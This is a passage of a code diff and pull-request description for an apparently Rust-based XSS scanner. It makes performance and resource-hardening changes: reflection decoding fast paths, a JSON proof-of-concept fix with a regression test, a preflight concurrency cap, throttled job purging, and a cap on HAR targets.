@@ -897,7 +915,19 @@ pub(crate) fn classify_reflection(resp_text: &str, payload: &str) -> Option<Refl
         return Some(ReflectionKind::UrlDecoded);
     }
 
-    let html_dec = decode_html_entities(resp_text);
+    // Only allocate the entity-decoded copy of the body when it actually
+    // contains an entity-introducing '&'; otherwise borrow `resp_text`
+    // directly so the common no-entity response in this per-payload slow path
+    // pays no full-body String copy. `html_dec == resp_text` in the borrowed
+    // case, so every `html_dec != resp_text` gate below short-circuits exactly
+    // as before.
+    let html_dec_owned;
+    let html_dec: &str = if resp_text.as_bytes().contains(&b'&') {
+        html_dec_owned = decode_html_entities(resp_text);
+        html_dec_owned.as_str()
+    } else {
+        resp_text
+    };
     // Only treat as an entity-decoded reflection when the response actually
     // changed under entity decoding. The previous predicate (variant present
     // in `html_dec`) is true even when no entities were decoded — in which
@@ -942,7 +972,7 @@ pub(crate) fn classify_reflection(resp_text: &str, payload: &str) -> Option<Refl
     }
 
     // Check URL decoded version of HTML decoded
-    if let Ok(url_dec_html) = urlencoding::decode(&html_dec)
+    if let Ok(url_dec_html) = urlencoding::decode(html_dec)
         && url_dec_html != html_dec
         && payload_variants
             .iter()
@@ -959,7 +989,7 @@ pub(crate) fn classify_reflection(resp_text: &str, payload: &str) -> Option<Refl
         return Some(ReflectionKind::UrlDecoded);
     }
 
-    if let Some(form_dec_html) = decode_form_urlencoded_like(&html_dec)
+    if let Some(form_dec_html) = decode_form_urlencoded_like(html_dec)
         && payload_variants
             .iter()
             .any(|candidate| form_dec_html.contains(candidate))

--- a/src/scanning/mod.rs
+++ b/src/scanning/mod.rs
@@ -787,6 +787,13 @@ fn build_request_text(target: &Target, param: &Param, payload: &str) -> String {
                         );
                     }
                     serde_json::to_string(&json_val).unwrap_or_else(|_| data.clone())
+                } else if param.value.is_empty() {
+                    // An empty `param.value` would make `str::replace` splice the
+                    // payload between every byte of `data` (empty-pattern match),
+                    // producing a garbled PoC. Re-serialize as `{name: payload}`
+                    // instead — identical to the no-data branch below and to what
+                    // `inject_payload` actually sends for invalid-JSON bodies.
+                    serde_json::json!({ &param.name: payload }).to_string()
                 } else {
                     data.replace(&param.value, payload)
                 }
@@ -1415,12 +1422,15 @@ impl ScanWorkerCtx {
         }
 
         // Save a reference copy for the HPP phase (only first 5 payloads)
-        // before the reflection phase consumes `reflection_payloads`.
-        let hpp_payloads: Vec<String> = if self.args.hpp {
-            reflection_payloads.iter().take(5).cloned().collect()
-        } else {
-            vec![]
-        };
+        // before the reflection phase consumes `reflection_payloads`. Gate on
+        // the same condition `run_hpp_phase` checks (Query location) so we don't
+        // clone payloads for params whose HPP phase would immediately return.
+        let hpp_payloads: Vec<String> =
+            if self.args.hpp && param.location == crate::parameter_analysis::Location::Query {
+                reflection_payloads.iter().take(5).cloned().collect()
+            } else {
+                vec![]
+            };
 
         if let PhaseFlow::Abort = self
             .run_reflection_phase(&param, reflection_payloads, &mut state)
@@ -1545,6 +1555,20 @@ impl ScanWorkerCtx {
             // Skip reflection if already found for this param
             let reflection_tuple = if state.reflection_found_locally {
                 (None, None)
+            } else if self.args.deep_scan {
+                // deep_scan never records into `found_params.reflection` (the
+                // write path short-circuits to `should_add = true` below), so
+                // the shared read would always return false. Skip the awaited
+                // lock and run the reflection check directly on every payload.
+                check_reflection_with_response_tracked(
+                    Some(self.client.as_ref()),
+                    &self.target,
+                    param,
+                    &reflection_payload,
+                    &self.args,
+                    &state.waf_streak,
+                )
+                .await
             } else {
                 let already = self
                     .found_params

--- a/src/scanning/tests.rs
+++ b/src/scanning/tests.rs
@@ -863,6 +863,47 @@ fn test_build_request_text_path_segment_injection() {
     assert!(request.contains("GET /a/hello%20world/c HTTP/1.1"));
 }
 
+#[test]
+fn test_build_request_text_json_body_empty_value_reserializes() {
+    // Regression (ORCH-2): an empty `param.value` used to make the JsonBody
+    // fallback call `str::replace("", payload)`, splicing the payload between
+    // every byte of the (invalid-JSON) body and producing a garbled PoC. It
+    // should re-serialize to `{name: payload}` instead, matching what the
+    // scanner actually sends for invalid-JSON bodies.
+    let mut target = parse_target("https://example.com/api").unwrap();
+    target.method = "POST".to_string();
+    target.data = Some("not-json-at-all".to_string());
+
+    let param = Param {
+        name: "q".to_string(),
+        value: String::new(),
+        location: Location::JsonBody,
+        injection_context: None,
+        valid_specials: None,
+        invalid_specials: None,
+        pre_encoding: None,
+        pre_encoding_pipeline: None,
+        wire_name: None,
+        form_action_url: None,
+        form_origin_url: None,
+        framework_sink: None,
+        escaped_specials: None,
+        js_breakout: None,
+    };
+
+    let request = build_request_text(&target, &param, "PAYLOAD");
+    assert!(
+        request.contains(r#"{"q":"PAYLOAD"}"#),
+        "expected re-serialized JSON body, got:\n{request}"
+    );
+    // The old empty-pattern splice produced "PAYLOADn…" (payload interleaved
+    // with the original body bytes); ensure that no longer happens.
+    assert!(
+        !request.contains("PAYLOADn"),
+        "payload should not be spliced into the original body:\n{request}"
+    );
+}
+
 #[tokio::test]
 async fn test_xss_scanning_get_query() {
     let mut target = parse_target("https://example.com").unwrap();

--- a/src/server/handlers.rs
+++ b/src/server/handlers.rs
@@ -791,11 +791,36 @@ pub(crate) async fn preflight_handler(
         .timeout
         .unwrap_or(crate::cmd::scan::DEFAULT_TIMEOUT_SECS);
 
+    // Bound concurrent preflights: each one pins a blocking-pool thread for the
+    // full request timeout against an attacker-controlled target, so an
+    // unthrottled burst could exhaust the blocking pool and stall every scan.
+    // Shed excess load with 503 instead. The permit is moved into the blocking
+    // closure below so it is held until that thread actually frees.
+    let preflight_permit = match state.preflight_sem.clone().try_acquire_owned() {
+        Ok(p) => p,
+        Err(_) => {
+            let resp = ApiResponse::<serde_json::Value> {
+                code: 503,
+                msg: "preflight capacity reached; retry shortly".to_string(),
+                data: None,
+            };
+            return make_api_response(
+                &state,
+                &headers,
+                &params,
+                StatusCode::SERVICE_UNAVAILABLE,
+                &resp,
+            );
+        }
+    };
+
     // Run the analysis on tokio's blocking pool (reused across calls) with a
     // current_thread runtime inside because analyze_parameters and scraper-
     // backed HTML inspection are !Send.
     let outcome: Result<serde_json::Value, PreflightError> =
         tokio::task::spawn_blocking(move || {
+            // Hold the admission permit for the lifetime of this blocking thread.
+            let _preflight_permit = preflight_permit;
             let rt = tokio::runtime::Builder::new_current_thread()
                 .enable_all()
                 .build()

--- a/src/server/mod.rs
+++ b/src/server/mod.rs
@@ -142,6 +142,8 @@ pub async fn run_server(args: ServerArgs) {
         rate_limit: args.rate_limit,
         scan_timeout: args.scan_timeout,
         max_concurrent_scans: args.max_concurrent_scans,
+        last_purge_ms: Arc::new(std::sync::atomic::AtomicI64::new(0)),
+        preflight_sem: Arc::new(tokio::sync::Semaphore::new(MAX_CONCURRENT_PREFLIGHT)),
     };
 
     let app = Router::new()

--- a/src/server/tests.rs
+++ b/src/server/tests.rs
@@ -32,6 +32,8 @@ fn make_state(
         scan_timeout: None,
         // 0 = unlimited so existing tests aren't rejected by the concurrency cap.
         max_concurrent_scans: 0,
+        last_purge_ms: Arc::new(std::sync::atomic::AtomicI64::new(0)),
+        preflight_sem: Arc::new(tokio::sync::Semaphore::new(MAX_CONCURRENT_PREFLIGHT)),
     }
 }
 
@@ -2017,6 +2019,40 @@ async fn test_purge_expired_jobs_removes_old_terminal_jobs() {
     assert!(
         jobs.contains_key("active"),
         "active job must never be purged"
+    );
+}
+
+#[tokio::test]
+async fn test_purge_expired_jobs_is_throttled() {
+    // SRV-3: the retention sweep is throttled to once per interval so it doesn't
+    // run an O(n) scan (and lock the jobs map) on every request.
+    let state = make_state(None, None, false, false, "cb");
+
+    // First sweep runs (last_purge_ms starts at 0) and removes the expired job.
+    {
+        let mut jobs = state.jobs.lock().await;
+        let mut old = test_job(JobStatus::Done, None, "");
+        old.finished_at_ms = Some(now_ms() - (JOB_RETENTION_SECS + 10) * 1000);
+        jobs.insert("old1".to_string(), old);
+    }
+    purge_expired_jobs(&state).await;
+    assert!(
+        !state.jobs.lock().await.contains_key("old1"),
+        "first purge should run and remove the expired job"
+    );
+
+    // A second, immediate sweep is throttled: a freshly-inserted expired job
+    // survives because the minimum interval hasn't elapsed yet.
+    {
+        let mut jobs = state.jobs.lock().await;
+        let mut old = test_job(JobStatus::Done, None, "");
+        old.finished_at_ms = Some(now_ms() - (JOB_RETENTION_SECS + 10) * 1000);
+        jobs.insert("old2".to_string(), old);
+    }
+    purge_expired_jobs(&state).await;
+    assert!(
+        state.jobs.lock().await.contains_key("old2"),
+        "second purge within the interval should be throttled (no-op)"
     );
 }
 

--- a/src/server/types.rs
+++ b/src/server/types.rs
@@ -112,6 +112,17 @@ pub(crate) struct AppState {
     pub(crate) scan_timeout: Option<u64>,
     // Max concurrent (queued + running) scans; 0 = unlimited.
     pub(crate) max_concurrent_scans: usize,
+    /// Throttle state for the best-effort job-retention purge: the last time
+    /// (ms since epoch) a sweep ran. The purge is O(n) over the whole job map
+    /// and used to run on every request (including the high-frequency poll
+    /// path), serializing handlers on the jobs lock; gating it keeps the sweep
+    /// to at most once per minute. Mirrors the MCP server's throttle.
+    pub(crate) last_purge_ms: Arc<std::sync::atomic::AtomicI64>,
+    /// Bounds concurrent `/preflight` work. Each preflight pins a blocking-pool
+    /// thread for the full request timeout against an attacker-controlled
+    /// target, so without a cap a burst can exhaust the blocking pool and stall
+    /// every scan server-wide. Permits are held until the blocking thread frees.
+    pub(crate) preflight_sem: Arc<tokio::sync::Semaphore>,
 }
 
 #[derive(Debug, Clone, Serialize, Deserialize)]

--- a/src/server/util.rs
+++ b/src/server/util.rs
@@ -61,9 +61,35 @@ pub(crate) fn validate_scan_options(opts: &ScanOptions) -> Result<(), String> {
     Ok(())
 }
 
+/// Minimum interval between job-retention sweeps. Retention is hours-granular,
+/// so deferring a sweep by up to a minute is invisible to clients while keeping
+/// the O(n) scan off the hot per-request path. Mirrors the MCP server.
+pub(crate) const PURGE_MIN_INTERVAL_MS: i64 = 60_000;
+
+/// Cap on concurrent `/preflight` operations. Each preflight pins a blocking-pool
+/// thread for the full request timeout, so this is sized well below tokio's
+/// default 512-thread blocking pool to guarantee scan jobs always have threads.
+pub(crate) const MAX_CONCURRENT_PREFLIGHT: usize = 32;
+
 /// Thin wrapper over `crate::job::purge_expired_jobs` that acquires the jobs
-/// lock for the caller.
+/// lock for the caller. Throttled to at most once per [`PURGE_MIN_INTERVAL_MS`]
+/// so the O(n) retention sweep doesn't run (and serialize all handlers on the
+/// jobs lock) on every request, including the high-frequency poll path.
 pub(crate) async fn purge_expired_jobs(state: &AppState) {
+    use std::sync::atomic::Ordering;
+    let now = crate::job::now_ms();
+    let last = state.last_purge_ms.load(Ordering::Relaxed);
+    if now - last < PURGE_MIN_INTERVAL_MS {
+        return;
+    }
+    // CAS so concurrent requests can't both decide to sweep.
+    if state
+        .last_purge_ms
+        .compare_exchange(last, now, Ordering::Relaxed, Ordering::Relaxed)
+        .is_err()
+    {
+        return;
+    }
     let mut jobs = state.jobs.lock().await;
     purge_jobs_map(&mut jobs, JOB_RETENTION_SECS);
 }

--- a/src/target_parser/har.rs
+++ b/src/target_parser/har.rs
@@ -112,10 +112,24 @@ pub fn parse_har(content: &str) -> Result<Vec<Target>, Box<dyn std::error::Error
     let content = content.trim_start_matches('\u{feff}');
     let har: Har = serde_json::from_str(content).map_err(|e| format!("invalid HAR JSON: {}", e))?;
 
+    // Hard cap on produced targets so a large-but-valid HAR can't amplify into
+    // multi-GiB resident memory (each Target plus the downstream all_target_urls
+    // / host_groups / dedup copies) beyond the input byte budget. Set far above
+    // any realistic capture; truncation is surfaced as a warning.
+    const MAX_HAR_TARGETS: usize = 1_000_000;
+
+    let total_entries = har.log.entries.len();
     let mut targets = Vec::new();
     let mut skipped_non_http = 0usize;
 
     for entry in har.log.entries {
+        if targets.len() >= MAX_HAR_TARGETS {
+            eprintln!(
+                "[warn] HAR has {} entries; capping at {} targets to bound memory",
+                total_entries, MAX_HAR_TARGETS
+            );
+            break;
+        }
         let req = entry.request;
 
         let url = match Url::parse(req.url.trim()) {


### PR DESCRIPTION
## Summary

A targeted **code-stability + performance** pass. Findings were surfaced by a fan-out audit across every subsystem, each adversarially verified, and only the high-confidence, **behavior-preserving** fixes were implemented. No functional behavior changes; the full lib test suite passes (1677 tests), clippy and fmt are clean.

### Performance (hot path & per-parameter)
The per-payload reflection path (`classify_reflection`, runs on every non-reflecting payload over the whole response body) did several unconditional full-body allocations:
- `decode_html_entities` now fast-paths bodies with no `&` (was 2 full-body allocs + 2 regex scans).
- `decode_form_urlencoded_like` skips its two full-body allocs when there's no `+`/`%`.
- `classify_reflection` borrows `resp_text` instead of allocating an entity-decoded copy when the body has no `&`.
- `payload_variants` drops its `HashSet` for a linear dedup over the tiny variant `Vec`.
- Static payload catalogs (`get_dynamic_xss_html_payloads`, `get_mxss_payloads`, `get_protocol_injection_payloads`, `get_dynamic_xss_attribute_payloads`) are memoized via `LazyLock` (templates are const, markers process-stable), collapsing the per-reflection-parameter rebuild into one.
- `scan_param`: gate the HPP payload clone on `Location::Query`; skip the per-payload `found_params` `RwLock` read under `--deep-scan` (never written there).

### Correctness
- `build_request_text`: fix garbled JSON PoC when an invalid-JSON body meets an empty `param.value` (empty-pattern `str::replace` splice) — re-serialize to `{name: payload}`, matching what the scanner actually sends. (+regression test)

### Stability / resource hardening
- **server `/preflight`**: admission semaphore (cap 32, held across the blocking thread) so a burst of slow attacker-controlled preflights can't exhaust tokio's blocking pool and stall all scans; 503 when full.
- **server job purge**: throttle the O(n) retention sweep to once/minute (CAS'd `last_purge_ms`) instead of running it — and locking the whole job map — on every request. (+regression test)
- **mcp**: replace 9 `jobs.lock().expect("poisoned")` sites with a poison-tolerant `lock_jobs()` helper, matching `mark_job_error_sync`, so one panic-under-lock can't permanently brick the server.
- **oob/interactsh**: cap the OAST poll body (4 MiB) instead of unbounded `resp.json()`, clamp the entry pre-alloc, and run RSA-2048 keygen on `spawn_blocking`.
- **config**: read config files through `read_bounded` (shared 1 MiB cap).
- **har**: cap produced targets (1M) to bound memory amplification.

## Testing
- `cargo test --lib` → 1677 passed, 0 failed
- `cargo clippy --all-targets` → clean
- `cargo fmt --check` → clean

🤖 Generated with [Claude Code](https://claude.com/claude-code)